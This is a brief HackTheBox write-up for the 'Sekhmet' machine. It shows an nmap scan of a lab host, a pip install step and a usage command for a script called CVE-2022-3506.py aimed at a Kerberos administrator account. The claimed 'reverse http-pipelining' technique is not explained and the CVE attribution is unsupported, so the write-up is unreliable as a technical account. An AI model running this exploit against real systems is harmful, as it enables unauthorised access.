## https://sploitus.com/exploit?id=584F1B4E-80A0-51DA-83E7-00AC037F9C48
# Sekhmet HackTheBox Writeup
Write-up for Sekhmet HackTheBox, CVE-2022-3506, Active Directory Exploitation
```
Starting Nmap 7.88 ( https://nmap.org ) at 2022-09-10 13:01 EDT
Nmap scan report for 10.xxx.xx.xxx
Host is up (0.055s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80/tcp open http nginx 1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 101.02 seconds
```
Using `CVE-2022-3506.py` (credit: zilla1) it is possible to tunnel through port 80 (`windcorp.htb`) and interact with Kerberos via an attack vector dubbed reverse http-pipelining.

## Install
```
pip install -r requirements.txt
```
## Usage
```
python3 CVE-2022-3506.py windcorp.htb/admin -dc-host windcorp.htb
```